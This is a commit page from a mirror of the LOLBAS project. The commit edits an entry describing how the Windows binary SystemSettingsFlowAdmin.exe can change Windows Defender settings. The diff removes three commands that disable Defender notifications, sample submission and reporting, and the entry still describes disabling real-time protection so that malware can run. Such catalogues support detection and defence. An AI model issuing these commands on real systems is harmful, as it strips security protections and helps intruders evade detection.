public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-01-24 20:42:09 +01:00
Code Issues Projects Releases Wiki Activity

fixing command error

Browse Source
This commit is contained in:
JasonPhang98 2025-01-19 18:19:22 +08:00
parent 5146752dde
commit c495757f40
1 changed files with 0 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
yml/OSBinaries/SystemSettingsAdminFlow.yml
View File

@ -4,9 +4,6 @@ Description: SystemSettingsAdminFlows.exe is responsible for the administrator p
Author: 'Jason Phang Vern-Onn'
Created: 2025-01-19
Commands:
- Command: C:\Windows\System32\SystemSettingsFlowAdmin.exe Defender DisableEnhancedNotifications 1
- Command: C:\Windows\System32\SystemSettingsFlowAdmin.exe Defender SubmitSamplesConsent 0
- Command: C:\Windows\System32\SystemSettingsFlowAdmin.exe Defender SpynetReporting 0
- Command: C:\Windows\System32\SystemSettingsFlowAdmin.exe Defender RTP 1
Description: SystemSettingsFlowAdmin.exe can be abused to modify Windows Defender settings, such as disabling enhanced notifications, submission consent, and real-time protection.
Usecase: Attackers can exploit this binary to disable critical Windows Defender settings and bypass security measures, enabling malware execution.